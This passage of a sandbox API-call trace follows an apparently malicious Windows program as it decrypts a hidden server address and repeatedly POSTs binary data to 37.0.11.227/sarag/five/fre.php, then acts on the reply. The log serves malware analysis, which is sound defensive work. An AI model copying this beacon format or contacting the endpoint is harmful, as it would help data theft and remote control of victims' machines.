1 [0286.775] GetProcessHeap () returned 0x690000 [0286.776] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0286.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.777] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0286.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.778] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0286.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.779] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0286.780] GetProcessHeap () returned 0x690000 [0286.780] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0286.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.781] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0286.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.782] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0286.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.783] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0286.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.784] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0286.784] GetProcessHeap () returned 0x690000 [0286.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0286.784] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0286.784] GetProcessHeap () returned 0x690000 [0286.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0286.784] socket (af=2, type=1, protocol=6) returned 0x92c [0286.784] connect (s=0x92c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0286.812] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0286.812] GetProcessHeap () returned 0x690000 [0286.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0286.812] GetProcessHeap () returned 0x690000 [0286.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0286.813] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0286.814] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0286.814] GetProcessHeap () returned 0x690000 [0286.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0286.814] GetProcessHeap () returned 0x690000 [0286.815] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0286.815] GetProcessHeap () returned 0x690000 [0286.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0286.815] GetProcessHeap () returned 0x690000 [0286.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0286.816] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0286.817] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0286.817] GetProcessHeap () returned 0x690000 [0286.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0286.818] GetProcessHeap () returned 0x690000 [0286.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0286.818] send (s=0x92c, buf=0x6ad508*, len=242, flags=0) returned 242 [0286.819] send (s=0x92c, buf=0x6aba40*, len=159, flags=0) returned 159 [0286.819] GetProcessHeap () returned 0x690000 [0286.819] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0286.819] recv (in: s=0x92c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0286.901] GetProcessHeap () returned 0x690000 [0286.902] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0286.902] GetProcessHeap () returned 0x690000 [0286.902] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0286.902] GetProcessHeap () returned 0x690000 [0286.902] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0286.903] GetProcessHeap () returned 0x690000 [0286.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0286.903] closesocket (s=0x92c) returned 0 [0286.904] GetProcessHeap () returned 0x690000 [0286.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0286.904] GetProcessHeap () returned 0x690000 [0286.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0286.904] GetProcessHeap () returned 0x690000 [0286.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0286.905] GetProcessHeap () returned 0x690000 [0286.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0286.905] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x176c) returned 0x92c [0286.907] Sleep (dwMilliseconds=0xea60) [0286.908] GetProcessHeap () returned 0x690000 [0286.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0286.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.911] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.916] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0286.924] GetProcessHeap () returned 0x690000 [0286.924] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0286.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.925] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0286.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.927] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.928] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.928] GetProcessHeap () returned 0x690000 [0286.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0286.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.950] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0286.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.951] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0286.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.952] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0286.952] GetProcessHeap () returned 0x690000 [0286.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0286.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.955] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0286.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.962] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0286.963] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.963] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0286.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.967] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0286.976] GetProcessHeap () returned 0x690000 [0286.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0286.976] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0286.979] GetProcessHeap () returned 0x690000 [0286.979] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0286.979] GetProcessHeap () returned 0x690000 [0286.980] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0286.980] GetProcessHeap () returned 0x690000 [0286.980] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0286.980] GetProcessHeap () returned 0x690000 [0286.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0286.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.981] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.990] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0286.997] GetProcessHeap () returned 0x690000 [0286.997] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0287.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.062] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0287.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.066] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.067] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.067] GetProcessHeap () returned 0x690000 [0287.068] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0287.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.069] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0287.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.070] CryptDestroyKey (hKey=0x69d028) returned 1 [0287.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.072] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0287.072] GetProcessHeap () returned 0x690000 [0287.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0287.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.073] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0287.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.075] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0287.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.076] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0287.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.077] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0287.077] GetProcessHeap () returned 0x690000 [0287.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0287.077] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0287.077] GetProcessHeap () returned 0x690000 [0287.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0287.077] socket (af=2, type=1, protocol=6) returned 0x930 [0287.078] connect (s=0x930, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0287.107] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0287.107] GetProcessHeap () returned 0x690000 [0287.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0287.107] GetProcessHeap () returned 0x690000 [0287.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0287.108] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0287.109] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0287.109] GetProcessHeap () returned 0x690000 [0287.109] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0287.111] GetProcessHeap () returned 0x690000 [0287.112] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0287.113] GetProcessHeap () returned 0x690000 [0287.113] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0287.113] GetProcessHeap () returned 0x690000 [0287.113] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0287.113] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0287.114] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0287.114] GetProcessHeap () returned 0x690000 [0287.114] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0287.114] GetProcessHeap () returned 0x690000 [0287.115] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0287.115] send (s=0x930, buf=0x6ad508*, len=242, flags=0) returned 242 [0287.116] send (s=0x930, buf=0x6aba40*, len=159, flags=0) returned 159 [0287.116] GetProcessHeap () returned 0x690000 [0287.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0287.116] recv (in: s=0x930, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0287.223] GetProcessHeap () returned 0x690000 [0287.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0287.223] GetProcessHeap () returned 0x690000 [0287.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0287.238] GetProcessHeap () returned 0x690000 [0287.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0287.240] GetProcessHeap () returned 0x690000 [0287.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0287.241] closesocket (s=0x930) returned 0 [0287.246] GetProcessHeap () returned 0x690000 [0287.247] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0287.247] GetProcessHeap () returned 0x690000 [0287.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0287.248] GetProcessHeap () returned 0x690000 [0287.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0287.248] GetProcessHeap () returned 0x690000 [0287.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0287.249] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1780) returned 0x930 [0287.255] Sleep (dwMilliseconds=0xea60) [0287.257] GetProcessHeap () returned 0x690000 [0287.257] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0287.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.258] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.302] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0287.310] GetProcessHeap () returned 0x690000 [0287.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0287.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.311] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0287.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.312] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.313] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.313] GetProcessHeap () returned 0x690000 [0287.313] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0287.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.342] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0287.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.343] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0287.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.344] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0287.344] GetProcessHeap () returned 0x690000 [0287.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0287.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.345] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0287.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.346] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0287.347] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.347] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0287.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.349] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0287.349] GetProcessHeap () returned 0x690000 [0287.349] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0287.349] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0287.349] GetProcessHeap () returned 0x690000 [0287.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0287.350] GetProcessHeap () returned 0x690000 [0287.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0287.353] GetProcessHeap () returned 0x690000 [0287.353] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0287.353] GetProcessHeap () returned 0x690000 [0287.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0287.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.354] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0287.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.359] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0287.365] GetProcessHeap () returned 0x690000 [0287.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0287.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.366] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0287.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.366] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0287.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.367] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0287.367] GetProcessHeap () returned 0x690000 [0287.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0287.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.368] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0287.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.369] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0287.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0287.370] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0287.370] GetProcessHeap () returned 0x690000 [0287.370] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0287.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.371] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0287.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.372] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0287.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0287.372] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") 